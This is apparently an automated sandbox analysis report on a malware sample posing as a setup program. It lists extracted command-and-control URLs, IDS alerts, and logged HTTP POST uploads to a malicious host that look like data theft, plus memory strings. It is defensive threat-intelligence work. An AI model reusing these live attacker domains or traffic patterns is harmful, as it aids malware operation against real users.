            Source: Malware configuration extractorURLs: zestmodp.top/zeda
            Source: Malware configuration extractorURLs: owlflright.digital/qopy
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49727 -> 172.67.157.7:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49725 -> 172.67.157.7:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49721 -> 172.67.157.7:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49726 -> 172.67.157.7:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49724 -> 172.67.157.7:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49729 -> 172.67.157.7:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49728 -> 172.67.157.7:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49723 -> 172.67.157.7:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 89.169.54.153:443
            Source: global trafficHTTP traffic detected: POST /ogda HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 79Host: bxattlepath.digital
            Source: global trafficHTTP traffic detected: POST /ogda HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=K1Cxtx5909AxbEK2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 19607Host: bxattlepath.digital
            Source: global trafficHTTP traffic detected: POST /ogda HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Kb2pYEC1I8GWMjfh1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 8769Host: bxattlepath.digital
            Source: global trafficHTTP traffic detected: POST /ogda HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0OAv0jt465WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 20392Host: bxattlepath.digital
            Source: global trafficHTTP traffic detected: POST /ogda HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=jO7676prUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 5412Host: bxattlepath.digital
            Source: global trafficHTTP traffic detected: POST /ogda HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=M5rCx1rQKbvEY51lEz0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 2390Host: bxattlepath.digital
            Source: global trafficHTTP traffic detected: POST /ogda HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=53YKf4xb4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 569583Host: bxattlepath.digital
            Source: global trafficHTTP traffic detected: POST /ogda HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 117Host: bxattlepath.digital
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: bxattlepath.digital
            Source: global trafficDNS traffic detected: DNS query: h1.mockupeastcoast.shop
            Source: unknownHTTP traffic detected: POST /ogda HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 79Host: bxattlepath.digital
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1402059952.00000000035F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1402059952.00000000035F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1402059952.00000000035F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1402059952.00000000035F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1402059952.00000000035F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1402059952.00000000035F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1402059952.00000000035F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeString found in binary or memory: http://ocsp.comodoca.com0
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1402059952.00000000035F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1402059952.00000000035F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeString found in binary or memory: http://ocsp.sectigo.com0
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeString found in binary or memory: http://ocsp.sectigo.com0B
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1402059952.00000000035F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1402059952.00000000035F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1375803058.0000000003568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1510012790.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494732558.00000000006EB000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1476995322.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1509334947.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461260878.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461949271.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494664228.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1469850554.0000000000694000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bxattlepath.digital/
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1510012790.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1509334947.00000000006EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bxattlepath.digital/.P
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1510012790.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494732558.00000000006EB000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1476995322.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1509334947.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461260878.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461949271.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494664228.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1469850554.0000000000694000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bxattlepath.digital/:
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1510012790.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494732558.00000000006EB000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1476995322.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1509334947.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461260878.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461949271.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494664228.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1469850554.0000000000694000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bxattlepath.digital/AMI
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1510012790.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494732558.00000000006EB000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1476995322.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1509334947.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461260878.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461949271.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494664228.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1469850554.0000000000694000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bxattlepath.digital/MP=
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1510012790.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494732558.00000000006EB000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1476995322.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1509334947.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461260878.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461949271.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494664228.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1469850554.0000000000694000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bxattlepath.digital/TM
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1510012790.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494732558.00000000006EB000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1476995322.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1509334947.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494664228.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1469850554.0000000000694000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bxattlepath.digital/b
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1510012790.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494732558.00000000006EB000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1476995322.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1509334947.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494664228.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1469850554.0000000000694000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bxattlepath.digital/k
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1476673359.00000000006FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bxattlepath.digital/ogda
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1398161440.0000000000719000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1398091643.0000000000713000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bxattlepath.digital/ogdaB
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1401494868.000000000070A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bxattlepath.digital/ogdaF
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461894681.00000000006FB000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461122437.00000000006F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bxattlepath.digital/ogdaIU
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1510036268.00000000006FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bxattlepath.digital/ogdaR
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1476673359.0000000000704000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bxattlepath.digital/ogdaRA
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494691707.000000000071A000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1476673359.000000000071A000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494713147.0000000000720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bxattlepath.digital/ogdaV
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1363440490.0000000000688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bxattlepath.digital/ogdaf
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1469741701.0000000000704000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461122437.0000000000704000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1510036268.00000000006FC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461894681.0000000000704000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1476673359.0000000000704000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bxattlepath.digital/ogdas
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461260878.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461949271.0000000000694000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bxattlepath.digital/ogdat
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1510012790.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494732558.00000000006EB000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1476995322.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1509334947.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461260878.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461949271.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494664228.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1469850554.0000000000694000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bxattlepath.digital/rog
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461260878.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461949271.0000000000694000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bxattlepath.digital/s
            Source: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1510012790.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494732558.00000000006EB000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1476995322.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1509334947.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461260878.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461949271.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 